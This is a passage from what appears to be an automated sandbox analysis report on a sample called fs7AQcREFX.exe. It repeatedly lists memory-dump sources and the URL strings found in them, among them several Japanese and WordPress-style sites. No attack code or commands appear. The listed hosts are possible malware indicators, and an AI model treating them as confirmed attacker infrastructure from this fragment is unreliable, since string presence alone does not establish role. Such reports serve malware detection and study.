                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506643329.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/ography
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/o
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/q
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/d
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/f
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cel-cpa.com/z
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503638672.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504279625.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/J
                      Source: fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/O
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/c
                      Source: fs7AQcREFX.exe, 00000000.00000003.503638672.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504279625.0000000000B2C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cokocoko.com/y
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/9-y
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/o
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/connect-polylang-elementor/assets/css/language-switcher.mi
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/elements-handlers.min.js?ver=3.13.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver=3.13.3
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, 